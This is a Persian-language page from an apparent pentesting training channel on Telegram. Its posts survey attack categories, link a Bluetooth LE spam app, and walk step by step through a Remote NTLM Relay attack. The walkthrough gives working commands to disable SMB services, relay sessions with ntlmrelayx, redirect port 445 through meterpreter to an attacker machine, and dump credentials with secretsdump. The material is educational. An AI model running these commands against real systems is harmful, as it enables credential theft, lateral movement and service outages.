Try Hack Box
5.9K subscribers
685 photos
65 videos
125 files
692 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
Try Hack Box
Photo
حملات قانونمند
هكرهای قانونمند، در طول شبيه سازي حمله يا تست نفوذ، از روشهاي زيادی بر ای به خطر انداختن امنيت سازمان استفاده ميكنند. مهمترين روشها عبارتند از :


شبكه راه دور remote :(در اين حمله سعي ميشود كه حمله از طريق اينترنت شبيه سازي شود. هكر قانونمند، تلاش ميكند تا در دستگاههاي دفاعي شبكه از قبيل فايروال، پروكسي، يا روتر آسيب پذيري پيدا كند .

شبكه راه دور up-dial :در اين حمله سعي ميشود كه به مودمهاي مشتري حمله شود. dialing War ،فرآيند
تكرار تماس براي يافتن سيستم باز است .

شبكه محلی: اين حمله، شخصي را شبيه سازي ميكند كه دسترسي فيزيكي و غير مجاز به شبكه دارد. براي انجام
اين حمله، هكر قانونمند بايد به شبكه دسترسي مستقيم داشته باشد .

سرقت تجهيزات: در اين حمله، سرقت منابع اطلاعاتي مهم از قبيل لپ تاپهاي كارمندان، شبيه سازي ميشود. با سرقت لپ تاپ، اطلاعاتي همچون نام كاربري، پسوردها، تنظيمات امنيتي و انواع رمزگذاري بدست مي آید.

اجتماعي: اين حمله، كارمندان سازمان را با استفاده از تلفن يا ارتباطات رو در رو براي جمعآوري اطلاعات مورد نياز حمله، مورد ارزيابي قرار مي دنده . حملات مهندسي اجتماعي، براي بدست آوردن نامهاي كاربري، پسوردها، يا ديگر اطلاعات امنيتي سازماني استفاده مي شوند

ورود فيزیکی: اين حمله تلاش ميكند تا محيط فيزيكي سازمان را به خطر بياندازد. يعني با دسترسي فيزيكي به آن، ميتواند ويروسها،تروجانها،rootkitها يا logger keyهاي سختافزاري را بر روي سيستمهاي شبكه هدف نصب كند .


#Attack
@TryHackBox
1
حملات ذر سطح برنامه های کاربردی ( Application level Attacks ) :

- امروزه برنامه های کاربردی با ویژیگی های بیشتر کد نویسی پیچیده تر منتشر می شود .
- با افزایش تقاضا برای ويژیگی های بیشتر توسعه دهندگان امنبت را نادیده میگیرند که این امر موجب بروز آسیب پذیری در برنامه میگردد .

- توسعه دهندگان برنامه باید آن را در بازه زمانی مشخصی ارایه دهند که خود باعث کاهش دفت در کدنویسی می گردد.

#Attack
@TryHackBox
حملات در سطح کدهای برنامه نویسی (‌ Shrink Warp Code Attacks ):

- چرا باید چرخ را دوباره اختراع کنید زمانی که قبلا اختراع شده است ؟

- سیستم عامل ها و برنامه های کاربردی قابلیت پشتیبانی از اسکریپت ها را دارند .

- توسعه دهندگان برای کاهش زمان برنامه نویسی و هزینه از کدهای اماده استفاده میکنند.

- مشکل اینجاست که توسعه دهندگان این کدها را بهینه سازی نمیکنند .

#‌Attack
@TryHackBox
حملات در موارد پیکربندی نادرست (‌ ‌Misconfiguration Attacks ‌) :

- پیکربندی نادرست می تواند پایگاه داده برنامه های تحت وب سیستم عامل ها و بخش های دیگر را دچار اسیب پذیری نماید .

- پیکربندی نادرست میتواند موجب دسترسی غیرقانونی به اطلاعات شود .

- اگر یک سیستم به درستی پیکربندی نشود مانند عدم تعیین صحیح مجوزها دیگر امن نخواهد بود .

- دستگاه باید ابتدا به درستی پیگربندی شده و سپس وارد شبکه شود .

- پیکربندی پیش فرض عامل بسیاری از نفوذها به شبکه است .

به منظور بهینه سازی پیکربندی باید تمام نرم اقزارها و سرویس های اضاقی را حدف نمود.


#Attack

@TryHackBox
طبقه بندی حملات

بر اساس IATF ، حملات امنیتی به پنج دسته تقسیم می شوند: منفعل ، فعال ، نزدیک ، خودی و توزیع.

#حملات
#Attack
@TryHackBox
🖥 مخزن: بلوتوث LE هرزنامه - درخواست های هرزنامه

اپلیکیشن اندروید برای انجام حملات اسپم بلوتوث.
این برنامه می‌تواند درخواست‌های اتصال کم‌انرژی بلوتوث را که خدمات جفت‌سازی سریع Google و Microsoft Swift Pairing را تقلید می‌کنند، جعل کند .

- این ممکن است منجر به هجوم پیام‌های پاپ آپ ناخواسته شود.

#BlueTooth #Attack
https://github.com/simondankelmann/Bluetooth-LE-Spam

@TryHackBox
Attack Surface Management.pdf
333.4 KB
انتقال به فضای ابری، افزایش برنامه های نرم افزار به عنوان سرویس ( SaaS )و افزایش ناگهانی توانایی های کار از راه دور، سطح حمله بیشتر سازمان ها بزرگ تر و پیچیده تر شده است و تعریف ...

تهیه شده توسط : تیم ترجمه TryHackBox

#Surface #attack
@TryHackBox
👌6🔥1
NTLM Relay Attack ?

خیلی‌ها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام می‌شن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست‌ های Broadcast هست که بعضی پروتکل‌ ها در شبکه‌ های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکه‌ای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو به‌دست می‌یاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
🔥5
🔖 اصل قضیه: Remote NTLM Relay

امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.

اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه.

برای exploiting باید چند مرحله ساده رو انجام بدیم.

💢 مرحله 1 > آماده‌ سازی سرور

برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه:

1. غیرفعال‌سازی NetLogon:
   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):
   sc stop lanmanserver
sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:
   sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست.
بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه.
پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم.

💢 مرحله 2 > تنظیم ماشین مهاجم

روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:
proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter

با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:
portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید.

💢 مرحله 4 > Post-exploitation

بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:
proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/[email protected]

چرا این وکتور کمتر رایجه؟

دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:

غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.

@TryHackBox
#AD #NTLM #Attack
🔥41